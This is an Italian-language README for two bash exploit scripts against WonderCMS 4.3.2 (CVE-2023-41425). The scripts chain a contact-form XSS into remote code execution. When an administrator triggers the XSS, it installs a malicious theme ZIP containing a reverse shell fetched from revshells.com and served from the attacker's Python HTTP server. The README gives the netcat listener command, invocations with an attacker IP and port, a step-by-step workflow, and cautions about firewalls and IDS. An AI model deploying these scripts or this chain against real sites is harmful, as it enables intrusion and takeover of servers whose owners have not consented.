
WonderCMS 4.3.2 Exploit XSS verso RCE
Panoramica
Questi script sfruttano una vulnerabilità XSS (Cross-Site Scripting) in WonderCMS 4.3.2 per ottenere Esecuzione Remota di Codice (RCE). Il payload XSS, quando innescato dall'amministratore, installa automaticamente una reverse shell sul server target sfruttando un modulo tematico malevolo creato ad hoc. La reverse shell viene ottenuta da revshells.com ed eseguita, concedendo all'attaccante accesso remoto al server.
Indice
Prerequisiti
Per eseguire con successo uno dei due script, sono necessari i seguenti strumenti e condizioni:
- Shell Bash: Entrambi gli script sono scritti per ambienti Linux che utilizzano la shell Bash.
- netcat (nc): Utilizzato per rimanere in ascolto della connessione della reverse shell.
- Python3: Un semplice server HTTP Python viene utilizzato per ospitare il payload XSS.
- WonderCMS 4.3.2: Il target deve eseguire una versione vulnerabile di WonderCMS.
- Interazione dell'amministratore: Il payload richiede che un amministratore inneschi l'XSS, che porta all'esecuzione della reverse shell.
- revshells.com: Il payload della reverse shell viene scaricato dinamicamente da revshells.com.
Script 1: Exploit Automatico
POC
Pasted image 20241010021603
Caratteristiche
Questa versione dell'exploit controlla automaticamente la presenza di un listener nc attivo, scarica la reverse shell, avvia il server HTTP, invia il payload e attende che l'amministratore inneschi la reverse shell.
- Configurazione automatica della reverse shell: Scarica una reverse shell pre-generata da revshells.com.
- Iniezione del payload XSS: Inietta un payload XSS nel modulo di contatto del target.
- Gestione del server HTTP: Avvia automaticamente un server HTTP Python per ospitare il payload della reverse shell.
- Controllo del listener nc: Verifica che il listener sia in esecuzione prima di procedere.
- Invio automatico del payload: Invia il payload automaticamente senza interazione da parte dell'utente.
Utilizzo
- Assicurati che il listener
nc sia in esecuzione sulla porta specificata:
nc -nvlp <PORT>
- Esegui lo script con il seguente comando:
./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
Esempio:
./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
Flusso di lavoro
- Scarica la reverse shell: Lo script scarica la reverse shell da
revshells.com.
- Modifica la reverse shell: Lo script della reverse shell viene aggiornato con l'IP e la porta dell'attaccante.
- Crea il payload ZIP: Viene creato un file ZIP contenente la reverse shell.
- Costruisci il payload XSS: Viene generato e iniettato nel modulo di contatto vulnerabile un payload XSS che installa la reverse shell.
- Avvio automatico del server HTTP: Lo script avvia un server HTTP Python per servire il payload malevolo.
- Invio automatico del payload: Il payload XSS viene inviato automaticamente all'amministratore.
Script 2: Exploit Manuale
POC
Pasted image 20241010013048
Utilizza l'exploit fornito dallo script nel campo Sito web...
Pasted image 20241010013218
Caratteristiche
Questa versione richiede che l'utente gestisca manualmente il listener nc e l'innesco del payload XSS. È più adatta per scenari in cui i processi automatici non sono desiderabili.
- Configurazione manuale della reverse shell: L'utente è responsabile di assicurarsi che il listener sia in esecuzione.
- Innesco manuale dell'XSS: Lo script fornisce il collegamento malevolo da inviare all'amministratore, ma il payload deve essere innescato manualmente.
- Gestione del server HTTP: Avvia un server HTTP Python per ospitare il payload XSS.
Utilizzo
- Assicurati che il listener
nc sia in esecuzione sulla porta specificata:
nc -nvlp <PORT>
- Esegui lo script con il seguente comando:
./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
Esempio:
./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
Flusso di lavoro
- Scarica la reverse shell: Scarica una reverse shell da
revshells.com.
- Modifica la reverse shell: Aggiorna la reverse shell con l'IP e la porta dell'attaccante.
- Crea il payload ZIP: Crea un file ZIP contenente la reverse shell.
- Costruisci il payload XSS: Genera un payload XSS che installa la reverse shell.
- Mostra il collegamento malevolo: Mostra il collegamento che deve essere inviato all'amministratore per l'innesco.
- Avvia il server HTTP: Avvia un server HTTP Python per ospitare il payload.
Note
- Interazione dell'amministratore: Entrambi gli exploit si basano sul fatto che l'amministratore di WonderCMS inneschi il payload XSS visitando la pagina vulnerabile. Una volta innescato, la reverse shell viene stabilita con la macchina dell'attaccante.
- Firewall/IDS/IPS: Prestare attenzione quando si eseguono questi exploit in ambienti protetti da firewall o sistemi di rilevamento delle intrusioni (IDS) che potrebbero bloccare o segnalare attività sospette.
- Divulgazione responsabile: Se scopri che un target è vulnerabile, segui sempre le linee guida etiche e segnala la vulnerabilità alle parti appropriate.